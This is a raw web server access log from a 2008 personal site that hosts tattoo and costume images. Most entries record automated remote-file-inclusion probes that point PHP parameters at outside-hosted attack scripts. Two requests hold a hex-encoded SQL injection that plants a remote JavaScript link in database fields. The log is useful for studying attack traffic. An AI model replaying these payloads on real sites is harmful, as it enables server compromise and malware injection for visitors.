83.172.140.17 - - [17/Aug/2008:05:43:37 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
82.194.67.123 - - [17/Aug/2008:05:43:52 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
82.194.67.123 - - [17/Aug/2008:05:43:52 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
89.218.85.18 - - [17/Aug/2008:05:44:39 -0500] "GET /logs/access_log.1214179200//config/dbutil.bck.php?confdir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
86.58.154.237 - - [17/Aug/2008:05:45:27 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
86.58.154.237 - - [17/Aug/2008:05:45:28 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
80.88.214.11 - - [17/Aug/2008:05:46:52 -0500] "GET /logs/access_log.1208649600/index1.php?qry=http://www.amordebicho.com/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
80.88.214.11 - - [17/Aug/2008:05:46:52 -0500] "GET /index1.php?qry=http://www.amordebicho.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
80.88.214.11 - - [17/Aug/2008:05:46:53 -0500] "GET /logs/index1.php?qry=http://www.amordebicho.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
84.201.221.2 - - [17/Aug/2008:05:46:53 -0500] "GET /logs/access_log.1208649600/index1.php?qry=http://www.amordebicho.com/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
84.201.221.2 - - [17/Aug/2008:05:46:53 -0500] "GET /index1.php?qry=http://www.amordebicho.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
84.201.221.2 - - [17/Aug/2008:05:46:54 -0500] "GET /logs/index1.php?qry=http://www.amordebicho.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.230.21.231 - - [17/Aug/2008:05:46:55 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
87.230.21.231 - - [17/Aug/2008:05:46:55 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
80.88.214.11 - - [17/Aug/2008:05:47:01 -0500] "GET /logs/access_log.1180396800/index1.php?qry=http://www.amordebicho.com/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
84.201.221.2 - - [17/Aug/2008:05:47:04 -0500] "GET /logs/access_log.1180396800/index1.php?qry=http://www.amordebicho.com/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.240.226.168 - - [17/Aug/2008:05:47:06 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
77.240.226.168 - - [17/Aug/2008:05:47:07 -0500] "GET //skin/zero_vote/error.php?dir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
203.88.114.169 - - [17/Aug/2008:05:47:36 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/saviours/cmd.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
203.88.114.169 - - [17/Aug/2008:05:47:36 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/saviours/cmd.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
201.130.79.132 - - [17/Aug/2008:05:47:44 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://melissa.lu/components/cmd.txt? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
201.130.79.132 - - [17/Aug/2008:05:47:44 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://melissa.lu/components/cmd.txt? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
89.218.85.18 - - [17/Aug/2008:05:48:10 -0500] "GET /logs/access_log.1206230400//Neos_Chronos/header.php?base_folder=http://64.251.8.142/safe.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:48:11 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:48:11 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
89.218.85.18 - - [17/Aug/2008:05:49:06 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://64.251.8.142/safe.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
89.218.85.18 - - [17/Aug/2008:05:49:08 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://64.251.8.142/safe.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
89.218.85.18 - - [17/Aug/2008:05:50:54 -0500] "GET /logs/access_log.1214524800//include/write.php?dir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:51:12 -0500] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:51:12 -0500] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
66.135.41.76 - - [17/Aug/2008:05:52:04 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
66.135.41.76 - - [17/Aug/2008:05:52:04 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
66.135.41.76 - - [17/Aug/2008:05:52:15 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
66.135.41.76 - - [17/Aug/2008:05:52:15 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
80.88.214.11 - - [17/Aug/2008:05:52:54 -0500] "GET /logs/index1.php?qry=http://www.amordebicho.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
89.218.85.18 - - [17/Aug/2008:05:52:54 -0500] "GET /logs/access_log.1214438400//include/write.php?dir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
80.88.214.11 - - [17/Aug/2008:05:52:54 -0500] "GET /index1.php?qry=http://www.amordebicho.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
84.201.221.2 - - [17/Aug/2008:05:53:34 -0500] "GET /logs/index1.php?qry=http://www.amordebicho.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
84.201.221.2 - - [17/Aug/2008:05:53:34 -0500] "GET /index1.php?qry=http://www.amordebicho.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.37.153 - - [17/Aug/2008:05:53:53 -0500] "GET /costume/thmb9.htm HTTP/1.0" 200 2155 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.153 - - [17/Aug/2008:05:54:03 -0500] "GET /costume/thmb5.htm HTTP/1.0" 200 2921 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.218.85.18 - - [17/Aug/2008:05:54:49 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://64.251.8.142/safe.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
151.11.24.250 - - [17/Aug/2008:05:55:30 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
151.11.24.250 - - [17/Aug/2008:05:55:30 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
151.11.24.250 - - [17/Aug/2008:05:55:30 -0500] "GET /logs/access_log.1206230400%20//newspublish/include.php?path%5Bdocroot%5D=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
66.135.41.76 - - [17/Aug/2008:05:55:53 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
66.135.41.76 - - [17/Aug/2008:05:55:53 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
72.36.180.26 - - [17/Aug/2008:05:55:57 -0500] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
72.36.180.26 - - [17/Aug/2008:05:55:57 -0500] "GET /logs/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
66.135.41.76 - - [17/Aug/2008:05:56:01 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
66.135.41.76 - - [17/Aug/2008:05:56:01 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
62.149.140.125 - - [17/Aug/2008:05:56:08 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
62.149.140.125 - - [17/Aug/2008:05:56:08 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
203.251.80.230 - - [17/Aug/2008:05:57:15 -0500] "GET //errors.php?error=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
72.36.180.26 - - [17/Aug/2008:05:58:08 -0500] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 294 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
72.36.180.26 - - [17/Aug/2008:05:58:19 -0500] "GET /logs/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 299 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
203.251.80.230 - - [17/Aug/2008:05:58:27 -0500] "GET //errors.php?error=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
151.11.24.250 - - [17/Aug/2008:05:58:28 -0500] "GET /logs//atom.php5?page=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
151.11.24.250 - - [17/Aug/2008:05:58:28 -0500] "GET //atom.php5?page=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
151.11.24.250 - - [17/Aug/2008:05:58:28 -0500] "GET /logs/access_log.1214179200//atom.php5?page=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
151.11.24.250 - - [17/Aug/2008:05:58:28 -0500] "GET /logs/access_log.1214524800//atom.php5?page=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
69.73.155.242 - - [17/Aug/2008:05:58:46 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
66.18.204.110 - - [17/Aug/2008:06:02:43 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
66.18.204.110 - - [17/Aug/2008:06:02:45 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
74.53.240.146 - - [17/Aug/2008:06:04:01 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.flbeachvolleyball.com/images/e-com/cid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
74.53.240.146 - - [17/Aug/2008:06:04:01 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.flbeachvolleyball.com/images/e-com/cid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
74.53.240.146 - - [17/Aug/2008:06:06:08 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.flbeachvolleyball.com/images/e-com/cid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
74.53.240.146 - - [17/Aug/2008:06:06:09 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.flbeachvolleyball.com/images/e-com/cid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
72.36.180.26 - - [17/Aug/2008:06:06:15 -0500] "GET //components/com_rsgallery/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 320 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
72.36.180.26 - - [17/Aug/2008:06:06:15 -0500] "GET /logs//components/com_rsgallery/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 325 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
72.36.180.26 - - [17/Aug/2008:06:07:23 -0500] "GET /logs//components/com_rsgallery/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
72.36.180.26 - - [17/Aug/2008:06:07:24 -0500] "GET //components/com_rsgallery/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
89.218.85.18 - - [17/Aug/2008:06:09:07 -0500] "GET /logs/access_log.1206230400//newspublish/include.php?path%5Bdocroot%5D=http://64.251.8.142/safe.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
89.218.85.18 - - [17/Aug/2008:06:09:07 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://64.251.8.142/safe.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
151.11.24.250 - - [17/Aug/2008:06:13:10 -0500] "GET /logs//ashnews.php?pathtoashnews=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
151.11.24.250 - - [17/Aug/2008:06:13:10 -0500] "GET //ashnews.php?pathtoashnews=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
203.251.80.230 - - [17/Aug/2008:06:14:14 -0500] "GET //errors.php?error=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
203.251.80.230 - - [17/Aug/2008:06:14:21 -0500] "GET //errors.php?error=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
151.11.24.250 - - [17/Aug/2008:06:14:39 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
151.11.24.250 - - [17/Aug/2008:06:14:39 -0500] "GET /logs/access_log.1214179200//PhpLinkExchange/bits_listings.php?svr_rootP=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
151.11.24.250 - - [17/Aug/2008:06:14:39 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
72.36.180.26 - - [17/Aug/2008:06:14:46 -0500] "GET //?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 1243 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
72.36.180.26 - - [17/Aug/2008:06:14:47 -0500] "GET /logs//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 95586 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
24.61.232.202 - - [17/Aug/2008:06:16:56 -0500] "GET /logs/access_log.1206230400?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 195475 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
24.61.232.202 - - [17/Aug/2008:06:17:05 -0500] "GET /logs/access_log.1206230400?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 195475 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
72.36.180.26 - - [17/Aug/2008:06:19:13 -0500] "GET //?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 1243 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
72.36.180.26 - - [17/Aug/2008:06:19:14 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
72.36.180.26 - - [17/Aug/2008:06:19:15 -0500] "GET /logs//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 95586 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
72.36.180.26 - - [17/Aug/2008:06:19:23 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
74.53.240.146 - - [17/Aug/2008:06:21:23 -0500] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.flbeachvolleyball.com/images/e-com/cid.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
74.53.240.146 - - [17/Aug/2008:06:21:23 -0500] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.flbeachvolleyball.com/images/e-com/cid.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
65.55.25.136 - - [17/Aug/2008:06:21:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.25.136 - - [17/Aug/2008:06:21:58 -0500] "GET /tattoo/set3.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
72.36.180.26 - - [17/Aug/2008:06:22:07 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 333 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
72.36.180.26 - - [17/Aug/2008:06:22:13 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 328 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
65.55.25.135 - - [17/Aug/2008:06:22:49 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.25.135 - - [17/Aug/2008:06:22:50 -0500] "GET /tattoo/set2.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
78.40.224.168 - - [17/Aug/2008:06:36:44 -0500] "GET /logs/access_log.1214524800//convert/mvcw.php?step=1&vwar_root=http://warsector.ru/access2006.log??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
78.40.224.168 - - [17/Aug/2008:06:36:44 -0500] "GET //convert/mvcw.php?step=1&vwar_root=http://warsector.ru/access2006.log??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
78.40.224.168 - - [17/Aug/2008:06:36:45 -0500] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://warsector.ru/access2006.log??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
151.11.24.250 - - [17/Aug/2008:06:37:25 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
144.138.213.82 - - [17/Aug/2008:06:38:26 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com.au/search?source=ig&hl=en&rlz=1G1GGLQ_ENAU289&q=flash+tattoos+vintage&meta=""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
144.138.213.82 - - [17/Aug/2008:06:38:27 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
144.138.213.82 - - [17/Aug/2008:06:38:28 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
144.138.213.82 - - [17/Aug/2008:06:38:37 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
144.138.213.82 - - [17/Aug/2008:06:38:37 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
144.138.213.82 - - [17/Aug/2008:06:38:37 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
144.138.213.82 - - [17/Aug/2008:06:38:42 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
144.138.213.82 - - [17/Aug/2008:06:38:47 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
144.138.213.82 - - [17/Aug/2008:06:38:50 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
144.138.213.82 - - [17/Aug/2008:06:38:51 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
144.138.213.82 - - [17/Aug/2008:06:38:58 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
144.138.213.82 - - [17/Aug/2008:06:38:58 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
144.138.213.82 - - [17/Aug/2008:06:39:05 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
144.138.213.82 - - [17/Aug/2008:06:39:06 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
87.219.229.123 - - [17/Aug/2008:06:42:40 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.219.229.123 - - [17/Aug/2008:06:42:40 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.219.229.123 - - [17/Aug/2008:06:42:43 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
